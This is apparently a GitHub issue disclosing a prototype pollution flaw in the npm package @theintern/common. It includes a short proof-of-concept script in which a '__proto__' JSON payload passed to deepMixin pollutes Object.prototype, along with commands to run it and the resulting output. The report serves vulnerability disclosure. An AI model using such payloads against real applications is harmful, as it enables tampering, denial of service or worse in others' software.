You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@theintern/common is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Reported the same in https://www.huntr.dev/bounties/1625553948781-theintern/intern/
🕵️♂️ Proof of Concept
1.Create the following PoC file:
// poc.js
var common = require("@theintern/common")
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {}
console.log("Before : " + {}.polluted);
common.deepMixin(obj, payload);
console.log("After : " + {}.polluted);
Execute the following commands in another terminal:
npm i @theintern/common # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : undefined
After : Yes! Its Polluted
The text was updated successfully, but these errors were encountered:
@theintern/common is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Reported the same in https://www.huntr.dev/bounties/1625553948781-theintern/intern/
🕵️♂️ Proof of Concept
1.Create the following PoC file:
Execute the following commands in another terminal:
Check the Output:
The text was updated successfully, but these errors were encountered: